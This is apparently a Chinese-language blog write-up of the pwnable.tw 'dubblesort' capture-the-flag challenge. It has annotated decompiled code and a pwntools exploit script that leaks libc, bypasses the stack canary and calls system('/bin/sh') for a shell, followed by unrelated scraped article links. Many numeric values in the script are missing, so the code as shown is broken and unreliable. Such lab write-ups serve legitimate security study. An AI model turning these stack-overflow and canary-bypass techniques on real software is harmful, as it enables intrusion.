(留坑,远程没打成功)

int __cdecl main(int argc, const char **argv, const char **envp)

{

  int t_num_count; // eax

  int *num_stack; // edi

  unsigned int input_count; // esi

  unsigned int output_ptr; // esi

  int v7; // ST08_4

  int result; // eax

  unsigned int num_count; // [esp+18h] [ebp-74h]

  int v10; // [esp+1Ch] [ebp-70h]

  char buf; // [esp+3Ch] [ebp-50h]

  unsigned int v12; // [esp+7Ch] [ebp-10h]

  v12 = __readgsdword(0x14u);

  sub_8B5();

  __printf_chk(, "What your name :");

  read(, &buf, 0x40u);

  __printf_chk(, "Hello %s,How many numbers do you what to sort :");// 栈空间未初始化为0,printf时\x00截断,导致栈空间信息泄露

  __isoc99_scanf("%u", &num_count);

  t_num_count = num_count;

  if ( num_count )

  {

    num_stack = &v10;

    input_count = ;

    do

    {

      __printf_chk(, "Enter the %d number : ");

      fflush(stdout);

      __isoc99_scanf("%u", num_stack);

      ++input_count;

      t_num_count = num_count;

      ++num_stack;

    }

    while ( num_count > input_count );

  }                                             // ebp-0x70读入num_count个数,栈溢出

  sub_931((unsigned int *)&v10, t_num_count);   // 冒泡,升序

  puts("Result :");

  if ( num_count )

  {

    output_ptr = ;

    do

    {

      v7 = *(&v10 + output_ptr);

      __printf_chk(, "%u ");                   // canary最低位为00,这里偏移24覆盖为\x00可以leak canary

      ++output_ptr;

    }

    while ( num_count > output_ptr );

  }

  result = ;

  if ( __readgsdword(0x14u) != v12 )

    sub_BA0();

  return result;

}
#! /usr/bin/env python

# -*- coding: utf- -*-

from pwn import *

context.log_level='DEBUG'

'''

r=remote('chall.pwnable.tw',)

libc=ELF('./libc_32.so.6')

'''

r=process('./dubblesort')

libc=ELF('/lib32/libc-2.27.so')

'''

r=process('./dubblesort',env={"LD_PRELOAD":"/root/pwnable.tw/dubblesort/libc_32.so.6"})

libc=ELF('./libc_32.so.6')

'''

#leak libc_base

r.recvuntil('What your name :')

r.sendline('a'*)

r.recvuntil('\n')

#libc_base=u32('\x00'+r.recv())-0x1D2CD0

libc_base=u32('\x00'+r.recv())-0x1D5000    #本地(我就TM奇他喵了个咪的怪了,本地能打远程就不行?

success('libc_base:'+hex(libc_base))

sys_addr=libc_base+libc.sym['system']

binsh_addr=libc_base+libc.search('/bin/sh').next()

#binsh_addr=libc_base+0x168e8b

success('sys_addr:'+hex(sys_addr))

success('binsh_addr:'+hex(binsh_addr))

'''

0x5f066 execl("/bin/sh", [esp])

constraints:

  esi is the GOT address of libc

  [esp] == NULL

one_gadget=libc_base+0x5f066

success('one_gadget addr:'+hex(one_gadget))

'''

#gdb.attach(r)

#r.recvuntil('How many numbers do you what to sort :')

r.sendline('')

for i in range(,):

    r.recvuntil(':')

    r.sendline(str(i))

#bypass canary

r.recvuntil(':')

r.sendline('+')    #,canary

for i in range(,):

    r.recvuntil(':')

    r.sendline(str(sys_addr))

for i in range(,):

    r.recvuntil(':')

    r.sendline(str(binsh_addr))

r.interactive()

本地能打成功,远程可能是给的libc没有找到'/bin/sh'(?直接在libc里找libc.search('/bin/sh').next()是可以找到的,但是在IDA同样的位置找到的并不是db类型的字符串常量'/bin/sh',此处留坑),one_gadget试了下也没成功

pwnable.tw dubblesort的更多相关文章

  1. pwnable.tw dubblesort 分析

    本系列为用于记录那些比较有意思的题目. 题目为一个排序算法,就如题目名称那样,dubblesort,32位程序. 利用思路为栈溢出,先是栈溢出泄露出栈上libc的相关数据从而获取libc地址,再是栈溢 ...

  2. pwnable.tw applestore

    存储结构 0x804B070链表头 struct _mycart_binlist { int *name; //ebp-0x20 int price; //ebp-0x1c struct _mycar ...

  3. pwnable.tw silver_bullet

    产生漏洞的原因 int __cdecl power_up(char *dest) { char s; // [esp+0h] [ebp-34h] size_t new_len; // [esp+30h ...

  4. pwnable.tw hacknote

    产生漏洞的原因是free后chunk未置零 unsigned int sub_80487D4() { int index; // [esp+4h] [ebp-14h] char buf; // [es ...

  5. pwnable.tw calc

    题目代码量比较大(对于菜鸡我来说orz),找了很久才发现一个能利用的漏洞 运行之发现是一个计算器的程序,简单测试下发现当输入的操作数超过10位时会有一个整型溢出 这里调试了一下发现是printf(&q ...

  6. pwnable.tw start&orw

    emm,之前一直想做tw的pwnable苦于没有小飞机(,今天做了一下发现都是比较硬核的pwn题目,对于我这种刚入门?的菜鸡来说可能难度刚好(orz 1.start 比较简单的一个栈溢出,给出一个li ...

  7. 【pwnable.tw】 starbound

    此题的代码量很大,看了一整天的逻辑代码,没发现什么问题... 整个函数的逻辑主要是红框中两个指针的循环赋值和调用,其中第一个指针是主功能函数,第二个数组是子功能函数. 函数的漏洞主要在main函数中, ...

  8. Pwnable.tw start

    Let's start the CTF:和stdin输入的字符串在同一个栈上,再准确点说是他们在栈上同一个地址上,gdb调试看得更清楚: 调试了就很容易看出来在堆栈上是同一块地址.发生栈溢出是因为:r ...

  9. pwnable.tw orw

    orw 首先,检查一下程序的保护机制 开启了canary保护,还是个32位的程序,应该是个简单的题

随机推荐

  1. Java数据库学习之模糊查询(like )

    Java数据库学习之模糊查询(like ): 第一种方式:直接在SQL语句中进行拼接,此时需要注意的是parm在SQL语句中需要用单引号拼接起来,注意前后单引号之间不能空格 String sql = ...

  2. vue中怎么全局引入sass文件

    1.添加依赖 npm install sass-resources-loader --save-dev 2.修改build/utils.js scss: generateLoaders('sass') ...

  3. 使用PHP操作ElasticSearch

    如何搭建ES环境和使用CURL操作可以参考我的另一篇文章:ElasticSearch尝试 网上很多关于ES的例子都过时了,版本很久,这篇文章的测试环境是ES6.5 通过composer 安装 comp ...

  4. sqlplus命令行登录oracle数据库的N种方法盘点

    欢迎访问我的个人博客IT废柴,本文永久链接移至:sqlplus命令行登录oracle数据库的N种方法盘点 sqlplus有几种登陆方式Oracle数据库, 比如: 1.以操作系统权限认证的oracle ...

  5. iOS NSInteger 的输出 %d %ld %zd %ld (long)

    NSInteger 输出类型 %zd

  6. Go语言中的Struct

    一.Go语言中没有像C#.Java一样的Class,只有Struct这样的结构体.Go语言使用type关键字来定义一个类型. 如下: type User struct { Name string Ag ...

  7. 入坑MATLAB必会的吐血总结

    本渣想回过头来整理一下MATLAB的一些基本的知识(很多东西比较琐碎,应该系统的梳理梳理),下文中没有提到的,自己用help查即可. 此文用来存个档,便于回顾. 由于matlab各版本部分语法存在差异 ...

  8. 通用权限管理系统之权限菜单zTree树的展示及移动的处理方法

    在通用权限管理系统中,有很多数据结构是有父子关系的,如组织机构,部门,权限菜单等,在展示的时候,大多数是通过zTree树的形式展现的,如下: 权限菜单展示 这种数据后台输出比较容易处理,参考如下获取某 ...

  9. vim打开退出命令

    打开文件方法:cd /Users/liuchang/.jenkins/secrets && vim initialAdminPassword 退出方法:先按ESC,再输入冒号,在输入命 ...

  10. css解决内联元素间的空白间隔

    在内联元素的父级元素上设置font-size: 0px;即可.例如: <div class="wrap"> <ul> <li class=" ...